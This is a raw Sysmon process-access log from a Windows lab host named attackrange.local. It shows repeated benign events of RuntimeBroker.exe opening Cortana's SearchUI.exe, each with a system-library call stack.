13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
